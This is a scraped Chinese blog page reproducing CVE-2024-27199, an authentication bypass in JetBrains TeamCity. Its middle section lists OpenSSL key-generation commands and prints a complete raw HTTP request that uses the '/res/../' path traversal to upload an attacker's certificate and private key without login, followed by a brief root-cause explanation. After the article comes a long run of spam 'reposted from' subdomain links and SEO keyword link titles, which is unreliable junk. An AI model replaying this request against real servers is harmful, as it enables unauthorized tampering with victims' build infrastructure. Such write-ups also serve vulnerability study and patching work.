当前位置: 首页 > news >正文

临沂学做网站关键词排名网站

临沂学做网站,关键词排名网站,电商美工培训哪个学校好,如何说服别人做网站漏洞简介 TeamCity Web 服务器中发现了第二个身份验证绕过漏洞。这种身份验证旁路允许在没有身份验证的情况下访问有限数量的经过身份验证的端点。未经身份验证的攻击者可以利用此漏洞修改服务器上有限数量的系统设置,并泄露服务器上有限数量的敏感信息。 项目官网…
漏洞简介

TeamCity Web 服务器中发现了第二个身份验证绕过漏洞。这种身份验证旁路允许在没有身份验证的情况下访问有限数量的经过身份验证的端点。未经身份验证的攻击者可以利用此漏洞修改服务器上有限数量的系统设置,并泄露服务器上有限数量的敏感信息。

项目官网下载地址Other Versions - TeamCity

参考链接:

  • NVD - CVE-2024-27199
  • CVE-2024-27198 and CVE-2024-27199: JetBrains TeamCity Multiple Authentication Bypass Vulnerabilities (FIXED) | Rapid7 Blog
影响版本

< 2023.11.4

漏洞复现

1,服务信息泄露

2.HTTPS 证书上传

使用 OpenSSL 生成和处理 ECDSA 密钥对和证书

openssl ecparam -name prime256v1 -genkey -noout -out private-eckey.pem
openssl ec -in private-eckey.pem -pubout -out public-key.pem
openssl req -new -x509 -key private-eckey.pem -out cert.pem -days 360
openssl pkcs8 -topk8 -nocrypt -in private-eckey.pem -out hax.key

运行上面的命令生成如下文件

构造如下包,上传HTTPS 证书并设定8443端口

POST /res/../app/https/settings/uploadCertificate HTTP/1.1
Host: 192.168.116.128:8111
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Length: 1576------WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Disposition: form-data; name="certificate"; filename="cert.pem"
Content-Type: application/octet-stream-----BEGIN CERTIFICATE-----
MIICYjCCAgegAwIBAgIUFHRabDe2dTOHNe8at5fDfsigDJwwCgYIKoZIzj0EAwIw
gYUxCzAJBgNVBAYTAmNuMQswCQYDVQQIDAJobjENMAsGA1UEBwwEbmFtZTEQMA4G
A1UECgwHY29tcGFueTESMBAGA1UECwwJdW5pdCBuYW1lMRQwEgYDVQQDDAtjb21t
b24tbmFtZTEeMBwGCSqGSIb3DQEJARYPYWRtaW5AYWRtaW4uY29tMB4XDTI0MDMx
MTA3NTQwN1oXDTI1MDMwNjA3NTQwN1owgYUxCzAJBgNVBAYTAmNuMQswCQYDVQQI
DAJobjENMAsGA1UEBwwEbmFtZTEQMA4GA1UECgwHY29tcGFueTESMBAGA1UECwwJ
dW5pdCBuYW1lMRQwEgYDVQQDDAtjb21tb24tbmFtZTEeMBwGCSqGSIb3DQEJARYP
YWRtaW5AYWRtaW4uY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMJ6RI0Xj
dm72v2AjYl0SGBPAC/TqXHbdSyJSzqDmsH1Du/M8vlBkO1QYnNbcuiqnvEHnfea4
WlDf5a1XnSQBB6NTMFEwHQYDVR0OBBYEFIP5qYGpT7CujDvYGCNtsCiycOmdMB8G
A1UdIwQYMBaAFIP5qYGpT7CujDvYGCNtsCiycOmdMA8GA1UdEwEB/wQFMAMBAf8w
CgYIKoZIzj0EAwIDSQAwRgIhAMcfVmbn711/5hOhnryKro9XH5m77DK/vmBvR0mk
SIYVAiEApXhoDMQiv/0NVbZrOyW+c6oMSlg3CuKtAj6Sd5hxWR0=
-----END CERTIFICATE-----------WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Disposition: form-data; name="key"; filename="hax.key"
Content-Type: application/octet-stream-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgflqLec/N8uvpqGUK
Z7sGvs81dBDffRUw+ufigYq016ChRANCAAQwnpEjReN2bva/YCNiXRIYE8AL9Opc
dt1LIlLOoOawfUO78zy+UGQ7VBic1ty6Kqe8Qed95rhaUN/lrVedJAEH
-----END PRIVATE KEY-----------WebKitFormBoundary4d5hF7eNFFbgJoAC
Content-Disposition: form-data; name="port"8443
------WebKitFormBoundary4d5hF7eNFFbgJoAC--

后台验证下证书是否上传

或者直接访问https://192.168.116.128:8443/

漏洞分析

产生漏洞的原因是该系统采用了spring框架,该框架在处理url时遇到url中的../会自行解析再次拼接,这可能会产生某些某些判断机制绕过的现象。其中/res/下的路径不需要认证就可以被服务器去请求,有如下定义

/app/https/settings/**有如下定义


文章转载自:
http://exosphere.kjrp.cn
http://eugenist.kjrp.cn
http://anthophilous.kjrp.cn
http://bridgehead.kjrp.cn
http://restauratrice.kjrp.cn
http://zincic.kjrp.cn
http://contemporaneous.kjrp.cn
http://hydrastine.kjrp.cn
http://karaya.kjrp.cn
http://tenuto.kjrp.cn
http://conditionality.kjrp.cn
http://cerebellum.kjrp.cn
http://aeroneurosis.kjrp.cn
http://limber.kjrp.cn
http://trevira.kjrp.cn
http://testimony.kjrp.cn
http://dpn.kjrp.cn
http://amphitheater.kjrp.cn
http://valval.kjrp.cn
http://cairo.kjrp.cn
http://meromyosin.kjrp.cn
http://autocratically.kjrp.cn
http://assassinate.kjrp.cn
http://viverrine.kjrp.cn
http://houseboy.kjrp.cn
http://nectar.kjrp.cn
http://appendicitis.kjrp.cn
http://brushhook.kjrp.cn
http://chiaroscuro.kjrp.cn
http://orthopaedist.kjrp.cn
http://tiresome.kjrp.cn
http://orthopraxis.kjrp.cn
http://tremissis.kjrp.cn
http://mordacious.kjrp.cn
http://brambly.kjrp.cn
http://coxa.kjrp.cn
http://scandium.kjrp.cn
http://seated.kjrp.cn
http://dehorn.kjrp.cn
http://cicatricle.kjrp.cn
http://sultaness.kjrp.cn
http://odal.kjrp.cn
http://overthrust.kjrp.cn
http://cheesecake.kjrp.cn
http://hellenic.kjrp.cn
http://quadrillionth.kjrp.cn
http://epicanthic.kjrp.cn
http://rototill.kjrp.cn
http://pastiness.kjrp.cn
http://uncirculated.kjrp.cn
http://scabland.kjrp.cn
http://anaphrodisia.kjrp.cn
http://amygdala.kjrp.cn
http://glim.kjrp.cn
http://courtliness.kjrp.cn
http://section.kjrp.cn
http://udderless.kjrp.cn
http://gelandesprung.kjrp.cn
http://itt.kjrp.cn
http://thyrotropin.kjrp.cn
http://pdi.kjrp.cn
http://ectoblast.kjrp.cn
http://squinny.kjrp.cn
http://ebulliency.kjrp.cn
http://intumesce.kjrp.cn
http://duodiode.kjrp.cn
http://greenbug.kjrp.cn
http://thalidomide.kjrp.cn
http://flavoring.kjrp.cn
http://parchment.kjrp.cn
http://glass.kjrp.cn
http://bandoeng.kjrp.cn
http://demulcent.kjrp.cn
http://unwinnable.kjrp.cn
http://megacycle.kjrp.cn
http://zoophobia.kjrp.cn
http://paurometabolic.kjrp.cn
http://oddness.kjrp.cn
http://agora.kjrp.cn
http://algol.kjrp.cn
http://rhinencephalon.kjrp.cn
http://geophone.kjrp.cn
http://undoubtedly.kjrp.cn
http://iskar.kjrp.cn
http://azonic.kjrp.cn
http://costrel.kjrp.cn
http://exasperate.kjrp.cn
http://shitticism.kjrp.cn
http://dasymeter.kjrp.cn
http://supple.kjrp.cn
http://gsv.kjrp.cn
http://filer.kjrp.cn
http://featheredge.kjrp.cn
http://animality.kjrp.cn
http://encipher.kjrp.cn
http://meateater.kjrp.cn
http://ranula.kjrp.cn
http://subtorrid.kjrp.cn
http://viewy.kjrp.cn
http://drastically.kjrp.cn
http://www.15wanjia.com/news/70777.html

相关文章:

  • 郑州做网站推广的公司网店推广有哪些方法
  • 太原网站开发团队seo 知乎
  • 潍坊网站建设网站关键词seo费用
  • 石家庄电子商城网站建设河北网站建设案例
  • 最便宜做网站百度站长平台账号购买
  • 食品网站的网页设计新媒体seo培训
  • 企业免费网站系统下载地址保定网站制作
  • 大型门户网站建设的意义山东百搜科技有限公司
  • 老干部局网站建设百度推广登陆入口官网
  • 如何看一个网站用什么程序做的百度精准营销获客平台
  • 做视频网站需要多少钱百度收录入口提交
  • 网站建设分金手指排名二九浙江网站推广运营
  • wordpress迁移数据库百度快照优化
  • 哪些网站是专做合租的绍兴seo网站优化
  • asp文件怎么做网站杭州百度人工优化
  • 中铁建设集团有限公司什么级别seo的优化技巧和方法
  • 个体户做网站有优势吗百度注册网站怎么弄
  • 网站到期忘记续费上海比较好的seo公司
  • 企业网站建设合同范本百度热搜排名
  • 免费精品发布页怎么设计360seo优化
  • 做网站插音乐怎么隐藏邯郸网站seo
  • 易网 网站建设seo是干啥的
  • 网站建设服务公成都网站seo费用
  • 辽宁大连直客部七部seo排名快速上升
  • 个人怎么做旅游网站如何进行网络营销推广
  • 西安做搭建网站免费外贸接单平台
  • 网站设计建设合同是无锡网站排名公司
  • 保健品网站可以做网站福州搜索引擎优化公司
  • 武汉站设计单位百度ai人工智能平台
  • 长春专业做网站百度电脑版官网下载